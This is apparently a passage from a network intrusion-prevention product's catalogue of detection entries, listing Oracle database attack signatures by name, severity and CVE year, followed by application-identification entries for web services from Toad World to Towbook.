TNS_Oracle-Database-DBMS-AQADM-Sys-SQL-Injection

About this situation: Oracle Database DBMS SQL Injection Provoledge Escalation
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2009, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-219-3038
Vulnerability: Oracle-Database-DBMS-AQADM-Sys-Package-Grant-Type-Access-Procedure-SQL-Injection
Description:
Back to top

TNS_Oracle-Database-DBMS-Assert-Filter-Bypass

About this situation: Detects SQL Injection attacks against the Oracle Database Server dbms_assert package
Context: Oracle TNS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2006, Any Operating System not specific, Oracle Database not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-DBMS-Assert-Filter-Bypass
Description:
Back to top

TNS_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation

About this situation: Usage of DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA, possible Oracle privilege escalation
Context: Oracle TNS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, Oracle 10g, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-361-4219
Vulnerability: Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
Description:
Back to top

TNS_Oracle-Database-DBMS-JVM-EXP-PERMS-System-Command-Execution

About this situation: An attempt to exploit a privilege escalation vulnerability in Oracle Database server over TNS detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, Any Operating System not specific, Oracle Database not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-605-5211
Vulnerability: Oracle-Database-DBMS_JVM_EXP_PERMS-System-Command-Execution
Description:
Back to top

TNS_Oracle-Database-DBMS-Snap-Internal-Package-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-DBMS_Snap_Internal-Package-Buffer-Overflow
Description:
Back to top

TNS_Oracle-Database-DBMS-TNS-Listener-Denial-Of-Service

About this situation: Oracle Database DBMS TNS Listener Denial of Service
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2009, Any Operating System not specific, Oracle Database not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-366-4219
Vulnerability: Oracle-Database-DBMS-TNS-Listener-Denial-Of-Service
Description:
Back to top

TNS_Oracle-Database-REPCAT-RPC.VALIDATE-REMOTE-RC-SQL-Injection

About this situation: Attempt to exploit an SQL injection vulnerability in Oracle Database Server over TNS detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2009, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-241-3038
Vulnerability: Oracle-Database-REPCAT_RPC.VALIDATE_REMOTE_RC-SQL-Injection
Description:
Back to top

TNS_Oracle-Database-Server-Access-Control-Bypass

About this situation: Access control bypass attempt using a vulnerability in the Oracle Database Server
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-274-4219
Vulnerability: Oracle-Database-Server-Access-Control-Bypass
Description:
Back to top

TNS_Oracle-Database-Server-CREATE-TABLES-SQL-Injection

About this situation: An attempt to exploit an SQL injection vulnerability in the Oracle Database Server package CTXSYS.DRVXTABC over TNS detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2009, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: Oracle-Database-Server-CREATE_TABLES-SQL-Injection
Description:
Back to top

TNS_Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Oracle Database Server over TNS detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2008, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow
Description:
Back to top

TNS_Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection

About this situation: Detects SQL injection exploits against Oracle Database Server
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection
Description:
Back to top

TNS_Oracle-Database-Server-DBMS-Metadata-Package-SQL-Injection

About this situation: Detects SQL injection exploits against Oracle Database Server
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server_DBMS-Metadata-Package-SQL-Injection
Description:
Back to top

TNS_Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection

About this situation: An attempt to exploit an SQL injection vulnerability in the Oracle Workspace Manager component over TNS detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2009, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-263-3038
Last changed: sgpkg-ips-263-3038
Vulnerability: Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection
Description:
Back to top

TNS_Oracle-Database-Server-MD2-Package-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database Server, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Oracle-Database-Server-MD2-Package-Buffer-Overflow
Description:
Back to top

TNS_Oracle-Database-Server-SDO-CS-TRANSFORM-LAYER-Buffer-Overflow

About this situation: Detects buffer overflow attempts against Oracle Database Server
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, Oracle 10g, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-SDO_CS-TRANSFORM_LAYER-Buffer-Overflow
Description:
Back to top

TNS_Oracle-Database-Server-SQL-Query-Directory-Traversal

About this situation: Detects directory traversal exploits against Oracle Database Server
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-SQL-Query-Directory-Traversal
Description:
Back to top

TNS_Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection

About this situation: SQL injection attempt using a vulnerability in Oracle Database Server package SYS.KUPV
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection
Description:
Back to top

TNS_Oracle-Database-Server-Sys-KUPV-SQL-Injection

About this situation: SQL injection attempt using a vulnerability in Oracle Database Server package SYS.KUPV
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-Sys-KUPV-SQL-Injection
Description:
Back to top

TNS_Oracle-Database-Server-XDB-Pitrig-truncate-Procedure-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Database, Oracle Application Server, CVE2008, Any Operating System not specific, Oracle Database not specific, Oracle Application Server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: TNS_Oracle-Database-Server-XDB-Pitrig_truncate-Procedure-Buffer-Overflow
Description:
Back to top

TNS_Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in the 'sys.pbsde.init' stored procedure in Oracle database
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow
Description:
Back to top

TNS_Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication

About this situation: An attempt to exploit a vulnerability in Oracle Database 10g Release 2 detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 10g, Oracle 11g, CVE2012, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-453-4333
Vulnerability: Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication
Description:
Back to top

TNS_Oracle-Oracle-Business-Intelligence-SQL-Injection

About this situation: Attempt to explot a vulnerability in Oracle Business Intelligence One
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence One, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Oracle-Business-Intelligence-SQL-Injection
Description:
Back to top

TNS_Oracle-Oracle-Database-Server-ctxsys.driload-Access-Violation

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, Any Operating System not specific, Oracle Database not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Oracle-Database-Server-ctxsys.driload-Access-Violation
Description:
Back to top

TNS_Oracle-Oracle-Database-Server-String-Conversion-Function-BOF

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, Any Operating System not specific, Oracle Database not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Oracle-Database-Server-String-Conversion-Function-BOF
Description:
Back to top

TNS_Oracle-Oracle-Database-Server-Xdb.dbms_xmlschema-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Database Server detected
Context: Oracle TNS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Database Server, CVE2006, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Oracle-Database-Server-Xdb.dbms_xmlschema-Buffer-Overflow
Description:
Back to top

TNS_Oracle-Oracle-Warehouse-Builder-WB_OLAP-SQL-Injection

About this situation: Attempt to explot a vulnerability in Oracle Warehouse Builder
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Warehouse Builder, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Oracle-Warehouse-Builder-WB_OLAP-SQL-Injection
Description:
Back to top

TNS_Oracle-Oracle-Warehouse-Builder-WB_RT-Multiple-SQL-Injections

About this situation: Attempt to explot a vulnerability in Oracle Warehouse Builder
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Warehouse Builder, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Oracle-Warehouse-Builder-WB_RT-Multiple-SQL-Injections
Description:
Back to top

TNS_Oracle-SQL-Database-Compromise

About this situation: Detects SQL Injection attack trying to compromise Oracle SQL server
Context: Oracle TNS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2006, Any Operating System not specific, Oracle Database not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-SQL-Injection-Database-Compromise
Description:
Back to top

TNS_Oracle-Sys-Pbsde-Init-BOF

About this situation: Buffer overflow vulnerability in Oracle sys.pbsde.init stored procedure
Context: Oracle TNS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Sys-Pbsde-Init-BOF
Description:
Back to top

TNS_Oracle-TNS-Service-Name-BOF

About this situation: Attempt to exploit a buffer overflow in Oracle
Context: Oracle TNS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, CVE2002, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-516-5211
Vulnerability: Oracle-TNS-Service-Name-BOF
Description:
Back to top

TNS_Oracle10g-TNS-Auth-Sesskey-BOF

About this situation: Attempt to exploit a buffer overflow in Oracle10g
Context: Oracle TNS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle 10g, CVE2009, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Oracle10g-TNS-Auth-Sesskey-BOF
Description:
Back to top

TNS_Oracle8i-TNS-Listener-BOF

About this situation: Attempt to exploit a buffer overflow in Oracle8i
Context: Oracle TNS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle 8i, CVE2001, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-402-4219
Vulnerability: Oracle8i-TNS-Listener-BOF
Description:
Back to top

Toad-World-by-DELL

About this situation: Application Toad-World-by-DELL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Toadworld- is Web-based training courses
Back to top

TodaysMeet

About this situation: Application TodaysMeet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TodaysMeet helps teachers embrace the backchannel and turn it into platform for learning, sharing, and speaking.
Back to top

ToDoist

About this situation: Application ToDoist detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Todoist is online task management app and to-do list. For Web, iPhone, iPad, Android, Chrome, Outlook.
Back to top

Toggl

About this situation: Toggl usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-630-5211
Description: Toggl is a time tracking software.
Back to top

TokBox

About this situation: TokBox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: TokBox is a PaaS (Platform as a Service) company that provides hosted infrastructure, APIs and tools required to deliver enterprise-grade WebRTC capabilities. TokBox's real-time communications platform, OpenTok, provides APIs to developers to deploy WebRTC applications, so as to add live video, voice and messaging to web applications.
Back to top

Tolina

About this situation: Application Tolina detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Arxes is an internationally operating IT system house offering high quality and practice-proven solutions one stop. The company is operating in the business fields engineering, IT infrastructure and software
Back to top

TollFreeForwarding

About this situation: Application TollFreeForwarding detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A TollFreeForwarding.com virtual phone system delivers your calls to any phone in the world. Voicemail, Auto Attendant and more.
Back to top

Tom's-Planner

About this situation: Application Tom's-Planner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tom's Planner is a web-based project planning system that allows anyone to easily create, collaborate, share and publish online planning schedules (Gantt Charts) with drag and drop simplicity. Tom's Planner also offers a variety of sample project planning templates to jump start the creation of project schedules including Gannt Chart, project planning, resource planning or event planning templates.
Back to top

Too-Files

About this situation: Too Files usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A data storage and backup site.
Back to top

Toodledo

About this situation: Toodledo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1764-5242
Description: is a service which provides organizing tasks with a list that can make everything much more manageable.
Back to top

TOOLS4COM-OIS

About this situation: Application TOOLS4COM-OIS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TOOLS4COM OIS is an online invoicing system, reproducing all the essential features of an invoicing desktop application, and creating a viable alternative for small and medium companies and independent workers.
Back to top

Toonimo

About this situation: Application Toonimo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Toonimo offers a cloud based platform that enables businesses to showcase the key features of their websites by acting as a pathfinder to site visitors.
Back to top

Top-Producer-8i

About this situation: Application Top-Producer-8i detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Top Producer 8i real estate marketing software to increase sales, generate leads, prospects and referrals. Manage contacts, schedule marketing, manage listings and closings.
Back to top

Topi

About this situation: Application Topi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Topi is developing mobile applications to enhance participants' experience at conferences and meetings.
Back to top

Topsec

About this situation: Application Topsec detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Topsec Technology is a provider of cloud based managed email and web security solutions. Providing services to a large and diverse international client base for over a decade.
Back to top

Toptal

About this situation: Application Toptal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Toptal is an online talent marketplace that connects start-ups, businesses, and organizations to a global network of software developers.
Back to top

TOR

About this situation: TOR usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-1873-5242
Description: TOR is a free communication anonymization software. It is widely used to bypass network surveillance. TOR directs traffic through a worldwide volunteer network to conceal the origin and destination of the connection.
Back to top

Tor2web

About this situation: Tor2web traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1128-5242
Description: Tor2web is a proxy tool for accessing Tor hidden websites from the public internet.
Back to top

Tor2web-Mirror

About this situation: Tor2web Mirror traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Description: This application detects known Tor2Web mirrors.
Back to top

Torch-LMS

About this situation: Application Torch-LMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Torch LMS is a business-focused online learning platform. This system represents a new breed of learning management systems.Torch LMS gives your organization all of the tools you need to manage, deliver, track, and report on employee training and development.
Back to top

Tori.fi

About this situation: Tori.fi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-630-5211
Description: Tori.fi is a Finnish online auction website.
Back to top

Torrent-Root

About this situation: Torrent root usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Torrent2crazy

About this situation: Torrent2crazy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Torrentbox.com

About this situation: Torrentbox.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Torrentmatrix

About this situation: Torrentmatrix usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Torrentportal

About this situation: TorrentPortal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Torrentreactor.net

About this situation: Torrentreactor.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Torrentz

About this situation: Torrentz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

TOSCA-Testsuite

About this situation: Application TOSCA-Testsuite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TOSCA - software solution for GUI, non-GUI, manual and automated tests including risk and requirements management.
Back to top

Toshiba-Cloud-Services

About this situation: Application Toshiba-Cloud-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Toshiba Cloud is a range of cloud storage based services provided by Toshiba.
Back to top

Totally.awe.sm

About this situation: Application Totally.awe.sm detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: awe.sm - apply performance metrics of social media strategy. Identify top-performing posts, channels, content, and influencers that most effectively spread the word and drive real business results. Target efforts and optimize social media marketing strategy based on what works
Back to top

Totango

About this situation: Application Totango detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Customer and User Engagement Management for Online Businesses
Back to top

Totoexpress

About this situation: totoexpress usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload or download files over the web
Back to top

Totorosa

About this situation: Totorosa usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Formerly known as Totodisk. A korean file-sharing website.
Back to top

TOTUS

About this situation: Application TOTUS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OTUS is a web-based marketing automation and customer communications management solution that enables sales and marketing teams, agencies, or anyone with a message to effectively and efficiently connect with their audiences.
Back to top

Touch-Point-Software

About this situation: Application Touch-Point-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TouchPoint Software develops cloud based church management software platform. The company also provides hosting, support, training, implementation, and development of open source software project.
Back to top

Tour-de-Force

About this situation: Application Tour-de-Force detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tour de Force software solutions are purpose built for the wholesale distribution and manufacturing industries, providing combined customer relationship management
Back to top

Tour-My-App

About this situation: Application Tour-My-App detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tour My App - online tool for create in-application tutorials that guide your users as they use your web application.
Back to top

Tout

About this situation: Application Tout detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tout - Real-Time Mobile Video Publishing.
Back to top

ToutApp

About this situation: Application ToutApp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ToutApp is provider of sales acceleration solutions that helps sales teams streamline communications to close more deals. Tout's robust tracking, templates and analytics help sales teams increase overall engagement throughout the sales process.
Back to top

Towbook

About this situation: Application Towbook detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Towbook is a towing management software company that specializes in providing cloud based management software for the towing industry under a software-as-a-service pricing model
Back to top

